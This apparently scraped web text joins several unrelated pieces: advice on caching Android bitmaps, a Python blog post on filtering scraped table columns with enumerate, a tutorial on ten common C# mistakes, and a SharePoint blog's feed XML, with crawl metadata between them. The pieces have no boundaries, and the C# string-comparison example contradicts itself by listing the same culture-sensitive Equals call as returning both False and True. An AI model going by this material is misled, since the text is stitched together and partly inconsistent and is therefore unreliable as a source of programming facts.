If your jpegs (pngs are lossless with bitmap ops IMO) are around 100k each you can just use a standard adapter to load them to fragments. If they are a lot larger, then you will have to figure out the bitmap 'compress' option to use with the decode in order not to waste a lot of memory on your fragment data structure.
If you need a threadpool in order to optimize the bitmap creation, then do that to remove any latency involved at that step.
I'm not sure that it works, but if you want to get more complicated, you could look at putting a circular buffer or something underneath the listArray that collaborates with the adapter.
IMO – once you have the structure, the transaction switching among fragments as you page should be very fast. I have direct experience with about 6 pics in memory each with size around 200k and it's fast at the page-fwd, page-back.
I used this app as a framework, focusing on the ‘page-viewer’ example.
It’s related to image caching, AsyncTask processing, background download from the net, etc.
Please read this page:
If you download and look into the sample project bitmapfun on that page, I trust it will solve all your problems. That’s a perfect sample.
Python: Selecting certain indexes in an array
A couple of days ago I was scraping the UK parliament constituencies from Wikipedia in preparation for the Graph Connect hackathon and had got to the point where I had an array with one entry per column in the table.

~~~python
import requests
from bs4 import BeautifulSoup
from soupselect import select

page = open("constituencies.html", 'r')
soup = BeautifulSoup(page.read())

for row in select(soup, "table.wikitable tr"):
    if select(row, "th"):
        print [cell.text for cell in select(row, "th")]
    if select(row, "td"):
        print [cell.text for cell in select(row, "td")]
~~~
~~~
$ python blog.py
[u'Constituency', u'Electorate (2000)', u'Electorate (2010)', u'Largest Local Authority', u'Country of the UK']
[u'Aldershot', u'66,499', u'71,908', u'Hampshire', u'England']
[u'Aldridge-Brownhills', u'58,695', u'59,506', u'West Midlands', u'England']
[u'Altrincham and Sale West', u'69,605', u'72,008', u'Greater Manchester', u'England']
[u'Amber Valley', u'66,406', u'69,538', u'Derbyshire', u'England']
[u'Arundel and South Downs', u'71,203', u'76,697', u'West Sussex', u'England']
[u'Ashfield', u'74,674', u'77,049', u'Nottinghamshire', u'England']
[u'Ashford', u'72,501', u'81,947', u'Kent', u'England']
[u'Ashton-under-Lyne', u'67,334', u'68,553', u'Greater Manchester', u'England']
[u'Aylesbury', u'72,023', u'78,750', u'Buckinghamshire', u'England']
...
~~~
I wanted to get rid of the 2nd and 3rd columns (containing the electorates) from the array since those aren't interesting to me as I have another source where I've got that data from.
I was struggling to do this but two different Stack Overflow questions came to the rescue with suggestions to use enumerate to get the index of each column and then add to the list comprehension to filter appropriately.
First we'll look at the filtering on a simple example. Imagine we have a list of 5 people:
people = ["mark", "michael", "brian", "alistair", "jim"]
And we only want to keep the 1st, 4th and 5th people. We therefore only want to keep the values that exist in index positions 0, 3 and 4, which we can do like this:

~~~python
>>> [x[1] for x in enumerate(people) if x[0] in [0,3,4]]
['mark', 'alistair', 'jim']
~~~
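The same filter reads slightly cleaner with tuple unpacking in the comprehension; this is an equivalent alternative, not something from the original post:

```python
people = ["mark", "michael", "brian", "alistair", "jim"]

# Unpack each (index, value) pair directly instead of indexing into x
keep = [v for i, v in enumerate(people) if i in [0, 3, 4]]
print(keep)  # ['mark', 'alistair', 'jim']
```

Unpacking avoids the slightly cryptic x[0]/x[1] subscripts while doing exactly the same enumerate-based filtering.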
Now let's apply the same approach to our constituencies data set:
~~~python
import requests
from bs4 import BeautifulSoup
from soupselect import select

page = open("constituencies.html", 'r')
soup = BeautifulSoup(page.read())

for row in select(soup, "table.wikitable tr"):
    if select(row, "th"):
        print [entry[1].text for entry in enumerate(select(row, "th")) if entry[0] in [0,3,4]]
    if select(row, "td"):
        print [entry[1].text for entry in enumerate(select(row, "td")) if entry[0] in [0,3,4]]
~~~
~~~
$ python blog.py
[u'Constituency', u'Largest Local Authority', u'Country of the UK']
[u'Aldershot', u'Hampshire', u'England']
[u'Aldridge-Brownhills', u'West Midlands', u'England']
[u'Altrincham and Sale West', u'Greater Manchester', u'England']
[u'Amber Valley', u'Derbyshire', u'England']
[u'Arundel and South Downs', u'West Sussex', u'England']
[u'Ashfield', u'Nottinghamshire', u'England']
[u'Ashford', u'Kent', u'England']
[u'Ashton-under-Lyne', u'Greater Manchester', u'England']
[u'Aylesbury', u'Buckinghamshire', u'England']
~~~
About the author
Mark Needham is a Developer Relations Engineer for Neo4j, the world's leading graph database.
About C Sharp.
C# is an object oriented, strongly-typed language. The strict type checking in C#, both at compile and run times, results in the majority of typical C# programming errors being reported as early as possible, and their locations pinpointed quite accurately. This can save a lot of time in C Sharp programming, compared to tracking down the cause of puzzling errors which can occur long after the offending operation takes place in languages which are more liberal with their enforcement of type safety. However, a lot of C# coders unwittingly (or carelessly) throw away the benefits of this detection, which leads to some of the issues discussed in this C# tutorial.
About This C Sharp Programming Tutorial
This tutorial describes 10 of the most common mistakes made by C# programmers, or problems to be avoided, and provides help in dealing with them.
While most of the mistakes discussed in this article are C# specific, some are also relevant to other languages that target the CLR or make use of the Framework Class Library (FCL).
Common C# Programming Mistake #1: Using a reference like a value or vice versa

In C#, whether a type behaves as a value or as a reference is decided by the author of the type, not by the programmer who uses it. This tends to be a “gotcha” for those trying to learn C# programming.
If you don’t know whether the object you’re using is a value type or reference type, you could run into some surprises. For example:

Point point1 = new Point(20, 30);
Point point2 = point1;
point2.X = 50;
Console.WriteLine(point1.X);    // 20 (does this surprise you?)
Console.WriteLine(point2.X);    // 50

Pen pen1 = new Pen(Color.Black);
Pen pen2 = pen1;
pen2.Color = Color.Blue;
Console.WriteLine(pen1.Color);  // Blue (or does this?)
Console.WriteLine(pen2.Color);  // Blue

As you can see, both the Point and Pen objects were created the exact same way, but the value of point1 remained unchanged when a new X coordinate value was assigned to point2, whereas the value of pen1 was modified when a new color was assigned to pen2. We can therefore deduce that point1 and point2 each contain their own copy of a Point object, whereas pen1 and pen2 contain references to the same Pen object. But how can we know that without doing this experiment?
The answer is to look at the definitions of the object types (which you can easily do in Visual Studio by placing your cursor over the name of the object type and pressing F12):
public struct Point { ... }  // defines a “value” type
public class Pen { ... }     // defines a “reference” type
As shown above, in C#, the struct keyword is used to define a value type, while the class keyword is used to define a reference type. For those with a C++ background, who were lulled into a false sense of security by the many similarities between C++ and C# keywords, this behavior likely comes as a surprise.
If you’re going to depend on some behavior which differs between value and reference types – such as the ability to pass an object as a method parameter and have that method change the state of the object – make sure that you’re dealing with the correct type of object to avoid C# programming problems.
Common C# Programming Mistake #2: Misunderstanding default values for uninitialized variables
In C#, value types can’t be null. By definition, value types have a value, and even uninitialized variables of value types must have a value. This is called the default value for that type. This leads to the following, usually unexpected result when checking if a variable is uninitialized:
class Program
{
    static Point point1;
    static Pen pen1;

    static void Main(string[] args)
    {
        Console.WriteLine(pen1 == null);    // True
        Console.WriteLine(point1 == null);  // False (huh?)
    }
}
Why isn’t point1 null? The answer is that Point is a value type, and the default value for a Point is (0,0), not null. Failure to recognize this is a very easy (and common) mistake to make in C#.
Many (but not all) value types have an IsEmpty property which you can check to see if it is equal to its default value:
Console.WriteLine(point1.IsEmpty); // True
When you’re checking to see if a variable has been initialized or not, make sure you know what value an uninitialized variable of that type will have by default and don’t rely on it being null.
Common C# Programming Mistake #3: Using improper or unspecified string comparison methods
There are many different ways to compare strings in C#.
Although many programmers use the == operator for string comparison, it is actually one of the least desirable methods to employ, primarily because it doesn’t specify explicitly in the code which type of comparison is wanted.
Rather, the preferred way to test for string equality in C# programming is with the Equals method:
public bool Equals(string value);
public bool Equals(string value, StringComparison comparisonType);
The first method signature (i.e., without the comparisonType parameter) is actually the same as using the == operator, but has the benefit of being explicitly applied to strings. It performs an ordinal comparison of the strings, which is basically a byte-by-byte comparison. In many cases this is exactly the type of comparison you want, especially when comparing strings whose values are set programmatically, such as file names, environment variables, attributes, etc. In these cases, as long as an ordinal comparison is indeed the correct type of comparison for that situation, the only downside to using the Equals method without a comparisonType is that somebody reading the code may not know what type of comparison you’re making. For example:
string s = "strasse";

// outputs False:
Console.WriteLine(s == "straße");
Console.WriteLine(s.Equals("straße"));
Console.WriteLine(s.Equals("straße", StringComparison.Ordinal));
Console.WriteLine(s.Equals("Straße", StringComparison.CurrentCulture));
Console.WriteLine(s.Equals("straße", StringComparison.OrdinalIgnoreCase));

// outputs True:
Console.WriteLine(s.Equals("straße", StringComparison.CurrentCulture));
Console.WriteLine(s.Equals("Straße", StringComparison.CurrentCultureIgnoreCase));
The safest practice is to always provide a comparisonType parameter to the Equals method. Here are some basic guidelines:
- When comparing strings that were input by the user, or are to be displayed to the user, use a culture-sensitive comparison (CurrentCulture or CurrentCultureIgnoreCase).
- When comparing programmatic strings, use ordinal comparison (Ordinal or OrdinalIgnoreCase).
- InvariantCulture and InvariantCultureIgnoreCase are generally best avoided except in rare cases.

When comparing strings to determine their relative order, use an overload of string.Compare that takes a StringComparison argument. This method is preferable to the <, <=, > and >= operators, for the same reasons as discussed above.
Common C# Programming Mistake #4: Using iterative (instead of declarative) statements to manipulate collections
In C# 3.0, the addition of Language-Integrated Query (LINQ) to the language changed forever the way collections are queried and manipulated. Since then, if you’re using iterative statements to manipulate collections, you didn’t use LINQ when you probably should have.
Some C# programmers don’t even know of LINQ’s existence, but fortunately that number is becoming increasingly small. Many still think, though, that because of the similarity between LINQ keywords and SQL statements, its only use is in code that queries databases.
While database querying is a very prevalent use of LINQ statements, they actually work over any enumerable collection (i.e., any object that implements the IEnumerable interface). So for example, if you had an array of Accounts, instead of writing a foreach loop like this:
decimal total = 0;
foreach (Account account in myAccounts)
{
    if (account.Status == "active")
    {
        total += account.Balance;
    }
}
you could just write:
decimal total = (from account in myAccounts
                 where account.Status == "active"
                 select account.Balance).Sum();
Common C# Programming Mistake #5: Failing to consider the underlying objects in a LINQ statement
LINQ is great for abstracting the task of manipulating collections, whether they are in-memory objects, database tables, or XML documents. In a perfect world, you wouldn’t need to know what the underlying objects are. But the error here is assuming we live in a perfect world. In fact, identical LINQ statements can return different results when executed on the exact same data, if that data happens to be in a different format.
For instance, consider the following statement:
decimal total = (from account in myAccounts
                 where account.Status == "active"
                 select account.Balance).Sum();
What happens if one of the objects’ account.Status equals “Active” (note the capital A)? When we talked about string comparison earlier, we saw that the == operator performed an ordinal comparison of strings. So why in this case is the == operator performing a case-insensitive comparison?
The answer is that when the underlying objects in a LINQ statement are references to SQL table data (as is the case with the Entity Framework DbSet object in this example), the statement is converted into a T-SQL statement and executed by the database, which follows T-SQL comparison rules (case-insensitive by default) rather than C# rules.
Common C# Programming Mistake #6: Getting confused or faked out by extension methods
As mentioned earlier, LINQ statements work on any object that implements IEnumerable. For example, the following simple function will add up the balances on any collection of accounts:
public decimal SumAccounts(IEnumerable<Account> myAccounts) { return myAccounts.Sum(a => a.Balance); }
In the above code, the type of the myAccounts parameter is declared as IEnumerable<Account>. Since myAccounts references a Sum method (C# uses the familiar "dot notation" to reference a method on a class or interface), we'd expect to see a method called Sum() on the definition of the IEnumerable<T> interface. However, the definition of IEnumerable<T> makes no reference to any Sum method and simply looks like this:
public interface IEnumerable<out T> : IEnumerable {
    IEnumerator<T> GetEnumerator();
}
So where is the Sum() method defined? Not on IEnumerable<T> itself. Rather, it is a static method (called an "extension method") that is defined on the System.Linq.Enumerable class:
namespace System.Linq {
    public static class Enumerable {
        ...
        // the reference here to "this IEnumerable<TSource> source" is
        // the magic sauce that provides access to the extension method Sum
        public static decimal Sum<TSource>(this IEnumerable<TSource> source,
                                           Func<TSource, decimal> selector);
        ...
    }
}
So what makes an extension method different from any other static method and what enables us to access it in other classes?
The distinguishing characteristic of an extension method is the this modifier on its first parameter. This is the "magic" that identifies it to the compiler as an extension method. The type of the parameter it modifies (in this case IEnumerable<TSource>) denotes the class or interface which will then appear to implement this method.

(As a side point, there's nothing magical about the similarity between the name of the IEnumerable interface and the name of the Enumerable class on which the extension method is defined. This similarity is just an arbitrary stylistic choice.)
With this understanding, we can also see that the SumAccounts function we introduced above could instead have been implemented as follows:
public decimal SumAccounts(IEnumerable<Account> myAccounts) {
    return Enumerable.Sum(myAccounts, a => a.Balance);
}
The fact that we could have implemented it this way instead raises the question: why have extension methods at all? Extension methods are essentially a convenience of the C# programming language that enables you to "add" methods to existing types without creating a new derived type, recompiling, or otherwise modifying the original type.
Extension methods are brought into scope by including a using [namespace]; statement at the top of the file. You need to know which C# namespace includes the extension methods you're looking for, but that's pretty easy to determine once you know what you're searching for.
When the C# compiler encounters a method call on an instance of an object, and doesn't find that method defined on the referenced object's class, it then looks at all extension methods that are within scope to try to find one which matches the required method signature and class. If it finds one, it will pass the instance reference as the first argument to that extension method; the rest of the arguments, if any, will be passed as subsequent arguments. (If the C# compiler doesn't find any corresponding extension method within scope, it will report a compilation error.)
Extension methods are an example of “syntactic sugar” on the part of the C# compiler, which allows us to write code that is (usually) clearer and more maintainable. Clearer, that is, if you’re aware of their usage. Otherwise, it can be a bit confusing, especially at first.
While there certainly are advantages to using extension methods, they can cause problems and a cry for C# programming help for those developers who aren’t aware of them or don’t properly understand them. This is especially true when looking at code samples online, or at any other pre-written code. When such code produces compiler errors (because it invokes methods that clearly aren’t defined on the classes they’re invoked on), the tendency is to think the code applies to a different version of the library, or to a different library altogether. A lot of time can be spent searching for a new version, or phantom “missing library”, that doesn’t exist.
Even developers who are familiar with extension methods still get caught occasionally, when there is a method with the same name on the object, but its method signature differs in a subtle way from that of the extension method. A lot of time can be wasted looking for a typo or error that just isn’t there.
Use of extension methods in C# libraries is becoming increasingly prevalent. In addition to LINQ, the Unity Application Block and the Web API framework are two examples of heavily-used modern Microsoft libraries that make use of extension methods, and there are many others. The more modern the framework, the more likely it is to incorporate extension methods.
Of course, you can write your own extension methods as well. Realize, however, that while extension methods appear to get invoked just like regular instance methods, this is really just an illusion. In particular, your extension methods can’t reference private or protected members of the class they’re extending and therefore cannot serve as a complete replacement for more traditional class inheritance.
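For instance, a minimal extension method of your own might look like the following (the WordCount example is purely an illustration of mine, not part of any standard library):

```csharp
using System;

// Extension methods must live in a non-generic static class.
public static class StringExtensions {
    // The 'this' modifier on the first parameter is what marks this
    // as an extension method on string.
    public static int WordCount(this string text) {
        return text.Split(new[] { ' ', '\t', '\n' },
                          StringSplitOptions.RemoveEmptyEntries).Length;
    }
}

class Program {
    static void Main() {
        string phrase = "extension methods are just static methods";

        // Invoked like an instance method...
        Console.WriteLine(phrase.WordCount());                 // 6

        // ...but the plain static-method call form works too.
        Console.WriteLine(StringExtensions.WordCount(phrase)); // 6
    }
}
```

Note that the extension method cannot touch any private state of string; it only sees what any other static method could see.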
Common C# Programming Mistake #7: Using the wrong type of collection for the task at hand
C# provides a large variety of collection objects, with the following being only a partial list: Array, ArrayList, BitArray, BitVector32, Dictionary<K,V>, Hashtable, HybridDictionary, List<T>, NameValueCollection, OrderedDictionary, Queue, Queue<T>, SortedList, Stack, Stack<T>, StringCollection, StringDictionary.
While there can be cases where too many choices is as bad as not enough choices, that isn’t the case with collection objects. The number of options available can definitely work to your advantage. Take a little extra time upfront to research and choose the optimal collection type for your purpose. It will likely result in better performance and less room for error.
If there’s a collection type specifically targeted at the type of element you have (such as string or bit) lean toward using that one first. The implementation is generally more efficient when it’s targeted to a specific type of element.
To take advantage of the type safety of C#, you should usually prefer a generic interface over a non-generic one. The elements of a generic interface are of the type you specify when you declare your object, whereas the elements of non-generic interfaces are of type object. When using a non-generic interface, the C# compiler can’t type-check your code. Also, when dealing with collections of primitive value types, using a non-generic collection will result in repeated boxing/unboxing of those types, which can result in a significant negative performance impact when compared to a generic collection of the appropriate type.
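The difference is easy to demonstrate in a short sketch: the non-generic ArrayList boxes every int and hands elements back as object, while List<int> keeps everything strongly typed and catches the same mistake at compile time:

```csharp
using System.Collections;
using System.Collections.Generic;

class Program {
    static void Main() {
        // Non-generic: every int is boxed to object on the way in,
        // and must be cast (and unboxed) on the way out.
        ArrayList untyped = new ArrayList();
        untyped.Add(1);
        untyped.Add("two");          // compiles fine -- the bug waits until runtime
        int first = (int)untyped[0]; // explicit cast required

        // Generic: no boxing, and the same mistake is a compile-time error.
        List<int> typed = new List<int> { 1, 2, 3 };
        // typed.Add("two");         // does not compile
        int sum = 0;
        foreach (int n in typed) { sum += n; }

        System.Console.WriteLine(first + sum); // 7
    }
}
```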
Another common C# problem is to write your own collection object. That isn’t to say it’s never appropriate, but with as comprehensive a selection as the one .NET offers, you can probably save a lot of time by using or extending one that already exists, rather than reinventing the wheel. In particular, the C5 Generic Collection Library for C# and CLI offers a wide array of additional collections “out of the box”, such as persistent tree data structures, heap based priority queues, hash indexed array lists, linked lists, and much more.
Common C# Programming Mistake #8: Neglecting to free resources
The CLR environment employs a garbage collector, so you don't need to explicitly free the memory allocated for an object. In fact, you can't. There's no equivalent of the C++ delete operator or the free() function in C. But that doesn't mean you can just forget about all objects after you're done using them. Many types of objects encapsulate some other type of system resource (e.g., a disk file, database connection, network socket, etc.). Leaving these resources open can quickly deplete the total number of system resources, degrading performance and ultimately leading to program faults.
While a destructor method can be defined on any C# class, the problem with destructors (also called finalizers in C#) is that you can't know for sure when they will be called. They are called by the garbage collector (on a separate thread, which can cause additional complications) at an indeterminate time in the future. Trying to get around these limitations by forcing garbage collection with GC.Collect() is not a C# best practice, as that will block the thread for an unknown amount of time while it collects all objects eligible for collection.
This is not to say there are no good uses for finalizers, but freeing resources in a deterministic way isn’t one of them. Rather, when you’re operating on a file, network or database connection, you want to explicitly free the underlying resource as soon as you are done with it.
Resource leaks are a concern in almost any environment. However, C# provides a mechanism that is robust and simple to use which, if utilized, can make leaks a much rarer occurrence. The .NET framework defines the IDisposable interface, which consists solely of the Dispose() method. Any object which implements IDisposable expects to have that method called whenever the consumer of the object is finished manipulating it. This results in explicit, deterministic freeing of resources.
If you are creating and disposing of an object within the context of a single code block, it is basically inexcusable to forget to call Dispose(), because C# provides a using statement that will ensure Dispose() gets called no matter how the code block is exited (whether by an exception, a return statement, or simply the closing of the block). And yes, that's the same using statement mentioned previously that is used to include C# namespaces at the top of your file. It has a second, completely unrelated purpose, which many C# developers are unaware of; namely, to ensure that Dispose() gets called on an object when the code block is exited:
using (FileStream myFile = File.OpenRead("foo.txt")) {
    myFile.Read(buffer, 0, 100);
}
By creating a using block in the above example, you know for sure that myFile.Dispose() will be called as soon as you're done with the file, whether or not Read() throws an exception.
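It may help to know that the using statement is essentially compiler shorthand for a try/finally block. The example above is roughly equivalent to the following expansion (a sketch; the file is created first and buffer is declared explicitly so the sample actually runs):

```csharp
using System.IO;

class Program {
    static void Main() {
        File.WriteAllText("foo.txt", "hello"); // ensure the file exists for the demo

        byte[] buffer = new byte[100];
        FileStream myFile = File.OpenRead("foo.txt");
        try {
            int bytesRead = myFile.Read(buffer, 0, 100);
            System.Console.WriteLine(bytesRead); // 5
        }
        finally {
            // Runs whether Read() returns normally or throws,
            // exactly as the using block guarantees.
            if (myFile != null) myFile.Dispose();
        }
    }
}
```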
Common C# Programming Mistake #9: Shying away from exceptions
C# continues its enforcement of type safety into runtime. This allows you to pinpoint many types of errors in C# much more quickly than in languages such as C++, where faulty type conversions can result in arbitrary values being assigned to an object’s fields. However, once again, programmers can squander this great feature, leading to C# problems. They fall into this trap because C# provides two different ways of doing things, one which can throw an exception, and one which won’t. Some will shy away from the exception route, figuring that not having to write a try/catch block saves them some coding.
For example, here are two different ways to perform an explicit type cast in C#:
// METHOD 1:
// Throws an exception if account can't be cast to SavingsAccount
SavingsAccount savingsAccount = (SavingsAccount)account;

// METHOD 2:
// Does NOT throw an exception if account can't be cast to
// SavingsAccount; will just set savingsAccount to null instead
SavingsAccount savingsAccount = account as SavingsAccount;
The most obvious error that could occur with the use of Method 2 would be a failure to check the return value. That would likely result in an eventual NullReferenceException, which could surface at a much later time, making it much harder to track down the source of the problem. In contrast, Method 1 would have immediately thrown an InvalidCastException, making the source of the problem much more immediately obvious.
Moreover, even if you remember to check the return value in Method 2, what are you going to do if you find it to be null? Is the method you’re writing an appropriate place to report an error? Is there something else you can try if that cast fails? If not, then throwing an exception is the correct thing to do, so you might as well let it happen as close to the source of the problem as possible.
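If you do use Method 2, one reasonable compromise (a sketch with stand-in Account classes of my own, not the article's model) is to check the result immediately and fail fast yourself, keeping the error close to its source:

```csharp
using System;

class Account { }
class SavingsAccount : Account { public decimal Rate = 0.02m; }
class CheckingAccount : Account { }

class Program {
    static decimal GetRate(Account account) {
        SavingsAccount savings = account as SavingsAccount;
        if (savings == null) {
            // Fail here, close to the source, instead of passing a null
            // along and getting a NullReferenceException much later.
            throw new InvalidCastException(
                "Expected a SavingsAccount, got " + account.GetType().Name);
        }
        return savings.Rate;
    }

    static void Main() {
        Console.WriteLine(GetRate(new SavingsAccount())); // 0.02

        try {
            GetRate(new CheckingAccount());
        }
        catch (InvalidCastException e) {
            Console.WriteLine(e.Message); // Expected a SavingsAccount, got CheckingAccount
        }
    }
}
```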
Here are a couple of examples of other common pairs of methods where one throws an exception and the other does not:
int.Parse();    // throws exception if argument can't be parsed
int.TryParse(); // returns a bool to denote whether parse succeeded

IEnumerable.First();          // throws exception if sequence is empty
IEnumerable.FirstOrDefault(); // returns null/default value if sequence is empty
Some C# developers are so "exception averse" that they automatically assume the method that doesn't throw an exception is superior. While there are certain select cases where this may be true, it is not at all correct as a generalization.

As a specific example, in a case where you have a legitimate alternative (e.g., default) action to take if an exception would have been generated, the non-exception approach could be a legitimate choice. In such a case, it may indeed be better to write something like this:
if (int.TryParse(myString, out myInt)) {
    // use myInt
} else {
    // use default value
}
instead of:
try {
    myInt = int.Parse(myString);
    // use myInt
} catch (FormatException) {
    // use default value
}
However, it is incorrect to assume that TryParse is therefore necessarily the "better" method. Sometimes that's the case, sometimes it's not. That's why there are two ways of doing it. Use the correct one for the context you are in, remembering that exceptions can certainly be your friend as a developer.
Common C# Programming Mistake #10: Allowing compiler warnings to accumulate
While this problem is definitely not C# specific, it is particularly egregious in C# programming since it abandons the benefits of the strict type checking offered by the C# compiler.
Warnings are generated for a reason. While all C# compiler errors signify a defect in your code, many warnings do as well. What differentiates the two is that, in the case of a warning, the compiler has no problem emitting the instructions your code represents. Even so, it finds your code a little bit fishy, and there is a reasonable likelihood that your code doesn’t accurately reflect your intent.
A common simple example for the sake of this C# programming tutorial is when you modify your algorithm to eliminate the use of a variable you were using, but you forget to remove the variable declaration. The program will run perfectly, but the compiler will flag the useless variable declaration. The fact that the program runs perfectly causes programmers to neglect to fix the cause of the warning. Furthermore, coders take advantage of a Visual Studio feature which makes it easy for them to hide the warnings in the “Error List” window so they can focus only on the errors. It doesn’t take long until there are dozens of warnings, all of them blissfully ignored (or even worse, hidden).
But if you ignore this type of warning, sooner or later, something like this may very well find its way into your code:
class Account {

    int myId;
    int Id; // compiler warned you about this, but you didn't listen!

    // Constructor
    Account(int id) {
        this.myId = Id; // OOPS!
    }
}
And at the speed Intellisense allows us to write code, this error isn’t as improbable as it looks.
You now have a serious error in your program (although the compiler has only flagged it as a warning, for the reasons already explained), and depending on how complex your program is, you could waste a lot of time tracking this one down. Had you paid attention to this warning in the first place, you would have avoided this problem with a simple five-second fix.
Remember, the C# compiler gives you a lot of useful information about the robustness of your code… if you're listening. Don't ignore warnings. They usually only take a few seconds to fix, and fixing new ones when they happen can save you hours. Train yourself to expect the Visual Studio "Error List" window to display "0 Errors, 0 Warnings", so that any warnings at all make you uncomfortable enough to address them immediately.
Of course, there are exceptions to every rule. Accordingly, there may be times when your code will look a bit fishy to the compiler, even though it is exactly how you intended it to be. In those very rare cases, use #pragma warning disable [warning id] around only the code that triggers the warning, and only for the warning ID that it triggers. This will suppress that warning, and that warning only, so that you can still stay alert for new ones.
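For example, to silence only CS0168 ("variable is declared but never used") around a single intentional occurrence, the pattern looks like this (a minimal sketch):

```csharp
class Program {
    static void Main() {
#pragma warning disable 0168
        // We really do want this unused variable here (say, for a
        // conditional-compilation branch), so suppress only CS0168,
        // and only for this declaration.
        int placeholder;
#pragma warning restore 0168

        System.Console.WriteLine("done");
    }
}
```

The matching #pragma warning restore re-enables the warning immediately afterwards, so the suppression cannot leak into the rest of the file.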
Wrap-up
Familiarizing yourself with the key nuances of C#, such as (but by no means limited to) the problems raised in this article, will help you get more out of the language while avoiding some of its most common pitfalls.
Understanding the Basics
What is C#?
C# is one of several programming languages that target the Microsoft CLR, which automatically gives it the benefits of cross-language integration and exception handling, enhanced security, a simplified model for component interaction, and debugging and profiling services.
What is the difference between C++ and C#?
C++ and C# are two completely different languages, despite similarities in name and syntax. C# was designed to be somewhat higher-level than C++, and the two languages also take different approaches to details like who determines whether a parameter is passed by reference or by value.
Why is C# used?
C# is used for many reasons, but the benefits of the Microsoft CLR tool set and a large developer community are two main draws to the language. | https://www.toptal.com/c-sharp/top-10-mistakes-that-c-sharp-programmers-make | CC-MAIN-2018-30 | en | refinedweb |
printf Example
It's better to use writef these days, but here's a printf example just for the heck of it.
import std.c.stdio; // printf comes from the C bindings in (old) Phobos

int main(char[][] args)
{
    printf("Hello World\n");
    return 0;
}
Here's the same thing with writef:
import std.stdio;

int main(char[][] args)
{
    writefln("Hello World");
    return 0;
}
However, when using the %s formatting token with printf you must be careful to pair it with the embedded length qualifier. The reason is that C and C++ strings are zero-terminated character arrays referenced by a pointer, whereas D strings are dynamic array objects — really an eight-byte structure containing a length and a pointer.
int main(char[][] args)
{
    printf("%.*s\n", args[0]);
    // printf("%s\n", args[0]); // <<-- This will fail.
    return 0;
}
| http://dsource.org/projects/tutorials/wiki/PrintfExample | CC-MAIN-2018-30 | en | refinedweb |
Another question that often arises is whether to use raw or cooked files. The answer here is very simple: Use cooked files. The only time to use raw files is for OPS (Oracle Parallel Server), where they are a key requirement.
Raw files offer two performance improvements: asynchronous I/O and no double-caching (i.e., caching of data in both the Oracle SGA and the UNIX file system cache). Quite often, the realized performance gain is relatively small. Some sources say 5–10%, while others wildly claim 50%. There really is no universal consensus on what the real performance gains of raw files are. However, nearly everyone agrees that raw generally requires a more skilled and well-trained administrative staff, because none of the standard UNIX file system commands function with raw files, and many backup/recovery suites do not either. Thus, the administrative headaches alone are reason enough to avoid raw files like the plague.
Again, if you've accepted the prior recommendation for Sun hardware, then there is a clear answer: Use cooked files. Solaris supports asynchronous I/O to both raw and file system data files. The only real penalty is double-caching of data.
If you genuinely believe that you need the performance gain raw files supposedly offer, then I strongly suggest looking at the Veritas file system with its Quick IO feature. Quick IO supports asynchronous I/O and eliminates double-caching. In short, Oracle accesses database files as if they were raw even though the DBA manages them as if they were regular files. Essentially, Quick IO provides a character-mode device driver and a file system namespace mechanism. For more information, I suggest reading the white paper titled "Veritas Quick IO: Equivalent to raw volumes, yet easier." It can be found on the Veritas Web site, under white papers.
The Veritas file system also supports online file system backups, which can be used to perform online incremental database backups. Furthermore, Veritas' online incremental backup is vastly superior to using Oracle's RMAN. The key difference is that Oracle's RMAN must scan all the blocks during an online incremental database backup to see which blocks have changed. RMAN saves magnetic tapes at the expense of time. The Veritas online incremental database backup knows which blocks have changed via its file system redo logs, so it saves both tape space and time. Finally, Veritas offers one of the easiest to manage UNIX file systems and backup/recovery suites available. Unfortunately, Veritas is only available for Solaris and HP-UX.
As another point of reference, I did my last data warehouse using raw files. I also do not own any shares of Veritas stock. And, I honestly do not feel like I am making this recommendation based on any personal prejudices. | http://etutorials.org/SQL/oracle+dba+guide+to+data+warehousing+and+star+schemas/Chapter+3.+Hardware+Architecture/The+Raw+vs.+Cooked+Files+Debate/ | CC-MAIN-2018-30 | en | refinedweb |
Steven Van de Craen's Blog feed for the Posts list.en-US2018-07-15T18:23:40-07:00Subscribe with BloglinesSubscribe with GoogleSubscribe with Live.com Van de Craen's Blog sync client and green locks (read-only sync) 365SharePointOneDriveContent TypesPnPTroubleshootingSteven Van de Craen2017-12-07T07:31:07-08:00The issue foll... (More)<img src="" height="1" width="1" alt=""/> 10 Creators Update: Slow wireless connection Van de Craen2017-05-08T04:07:07-07:00A... (More)<img src="" height="1" width="1" alt=""/> GetTermSets Failed to compare two elements in the array Van de Craen2016-12-23T08:36:51-08:00This sys... (More)<img src="" height="1" width="1" alt=""/> - Upgrading SharePoint - Some views not upgraded to XsltListViewWebPart Van de Craen2016-08-24T08:03:00-07:00The old st... (More)<img src="" height="1" width="1" alt=""/> 2013: InfoPath client forms may open twice [Oct15CU bug] Van de Craen2015-12-16T12:47:00-08:00Oops After a recent Patch Night one of my customers had pulled in SharePoint updates along with Windows Updates and people started complaining about changed behavior PDF files no longer immediately open in the browser. Instead the PDF client (Adobe Reader) opens up and provides rich integration with... (More)<img src="" height="1" width="1" alt=""/> 2013: Programmatically set crawl cookies for forms authenticated web sites Van de Craen2015-08-29T00:54:29-07:00Last week I was having difficulties in crawling forms authenticated web sites. When configuring a crawl rule to store the authentication cookies the login page was returning multiple cookies with same name but different domain. This gave issues in a later stage (during crawl) because all cookies... 
(More)<img src="" height="1" width="1" alt=""/> 2013: Some observations on Enterprise Search Van de Craen2015-08-13T09:44:08-07:00I’m doing some testing with the Enterprise Search in SharePoint 2013 for a customer scenario and here are some observations… Content Source as Crawled Property The “Content Source” name is out of the box available as Managed Property on all content in the search index This makes it possible t... (More)<img src="" height="1" width="1" alt=""/>: Portal navigation limited to 50 dynamic items Van de Craen2015-08-12T04:07:28-07:00Is... (More)<img src="" height="1" width="1" alt=""/>: Users cannot create new subsites Van de Craen2015-07-13T10:02:49-07:00Issue “Sit... (More)<img src="" height="1" width="1" alt=""/> 2013: Open PDF files in client application Van de Craen2015-06-26T09:23:14-07:00Share colleagu... (More)<img src="" height="1" width="1" alt=""/> 2013: Enable 'Change Item Order' Ribbon Action Van de Craen2015-06-04T10:00:00-07:00My S... (More)<img src="" height="1" width="1" alt=""/> site collections from explicit managed path to wildcard managed path Van de Craen2015-03-14T00:41:20-07:00 o... (More)<img src="" height="1" width="1" alt=""/> Publishing Feature activation failed Van de Craen2014-12-16T07:19:22-08:00Last week I ran into an issue while reactivating the Publishing Feature on webs in a migrated (Dutch) site collection. If you have ever upgraded localized SharePoint 2007 Publishing sites this should sound familiar to you. What happens is that while in SharePoint 2007 the Pages library was called “P... (More)<img src="" height="1" width="1" alt=""/>: Rendering inside 